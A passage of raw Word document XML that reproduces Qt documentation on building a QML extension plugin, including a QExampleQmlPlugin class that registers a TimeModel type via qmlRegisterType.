        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    Q_PROPERTY(</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="type"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> minute READ minute NOTIFY timeChanged)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00192E15" w:rsidRPr="00192E15" w:rsidRDefault="00192E15" w:rsidP="00192E15">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    ...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00192E15" w:rsidRPr="00192E15" w:rsidRDefault="00192E15" w:rsidP="00192E15">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>To make this type available, we create a plugin class named</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QExampleQmlPlugin</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>which is a subclass of</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId325" w:history="1">
        <w:r w:rsidRPr="00192E15">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQmlExtensionPlugin</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. It overrides the</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId326" w:anchor="registerTypes" w:history="1">
        <w:r w:rsidRPr="00192E15">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>registerTypes()</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>method in order to register the</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TimeModel</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type using</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId327" w:anchor="qmlRegisterType" w:history="1">
        <w:r w:rsidRPr="00192E15">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qmlRegisterType</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(). It also uses the</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId328" w:anchor="Q_PLUGIN_METADATA" w:history="1">
        <w:r w:rsidRPr="00192E15">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Q_PLUGIN_METADATA</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>() macro in the class definition to register the plugin with the Qt meta object system using a unique identifier for the plugin.</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QExampleQmlPlugin</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QQmlExtensionPlugin</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un"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</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Q_OBJECT</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Q_PLUGIN_METADATA</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IID </w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QQmlExtensionInterface_iid</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</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w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> registerTypes</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>const</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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uri</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</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w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00192E15" w:rsidRPr="00877F4C" w:rsidRDefault="00192E15" w:rsidP="00192E15">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00877F4C">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        Q_ASSERT</w:t>
      </w:r>
      <w:r w:rsidRPr="00877F4C">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00877F4C">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">uri </w:t>
      </w:r>
      <w:r w:rsidRPr="00877F4C">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>==</w:t>
      </w:r>
      <w:r w:rsidRPr="00877F4C">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00877F4C">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QLatin1String</w:t>
      </w:r>
      <w:r w:rsidRPr="00877F4C">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00877F4C">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"TimeExample"</w:t>
      </w:r>
      <w:r w:rsidRPr="00877F4C">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>));</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qmlRegisterType</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TimeModel</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;(</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>uri</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w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</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w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0</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w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Time"</w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</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w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00192E15" w:rsidRPr="00192E15" w:rsidRDefault="00192E15" w:rsidP="00192E15">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00877F4C" w:rsidRPr="007A24CD" w:rsidRDefault="00877F4C" w:rsidP="00192E15">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A24CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00877F4C">
        <w:rPr>
